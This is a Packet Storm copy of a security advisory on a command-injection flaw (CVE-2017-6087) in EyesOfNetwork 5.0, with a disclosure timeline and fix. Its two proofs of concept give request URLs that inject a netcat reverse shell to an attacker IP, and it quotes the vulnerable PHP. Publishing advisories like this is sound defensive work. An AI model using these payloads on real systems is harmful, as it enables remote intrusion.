exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

EON 5.0 Remote Code Execution

EON 5.0 Remote Code Execution
Posted Mar 24, 2017
Authored by Nicolas Serra

EON versions 5.0 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2017-6087
SHA-256 | c7846fe3c70cdb527a601ecf168a4bbb668fde1a6cdac12993d51150965c4783

EON 5.0 Remote Code Execution

Change Mirror Download
# [CVE-2017-6087] EON 5.0 Remote Code Execution

## Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

## Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing
authenticated users to execute arbitrary code.

**CVE ID**: CVE-2017-6087

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-78

**CVSS Base Score**: 7.6

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L


### Proof of Concept 1

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `selected_events` parameter is not correctly filtered before it is
used by the `shell_exec()` function.

There, it is possible to inject a payload like in the request below,
where we connect back to our handler:

```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```

#### Vulnerable code

The payload gets injected into the `$event[$key]` and `$ged_command`
variables of the `module/monitoring_ged/ged_functions.php` file, line 373:

```
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
if($value["type"] == true){
if($key == "owner"){
$event[$key] = $owner;
}
$ged_command .= "\"".$event[$key]."\" ";
}
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```

Two other functions in this file are also affected by this problem:

* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`


### Proof of Concept 2

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `module` parameter is not correctly filtered before it is used by
the `shell_exec()` function.

Again, we inject our connecting back payload:

```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```

#### Vulnerable code

In the `module/index.php` file, line 24, we can see that our payload is
injected into the `exec()` function without any sanitization:

```
# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {

$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");

# Redirect to module page if rpm installed
if($module!=0) { header('Location: '.$_GET["link"].''); }

}
```


## Timeline (dd/mm/yyyy)

* 01/10/2016 : Initial discovery.
* 09/10/2016 : Fisrt contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
repsonsible disclosure agreement.
* 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

## Solution

Update to version 5.1

## Affected versions

* Version <= 5.0

## Credits

* Nicolas SERRA <n.serra@sysdream.com>

--
SYSDREAM Labs <labs@sysdream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close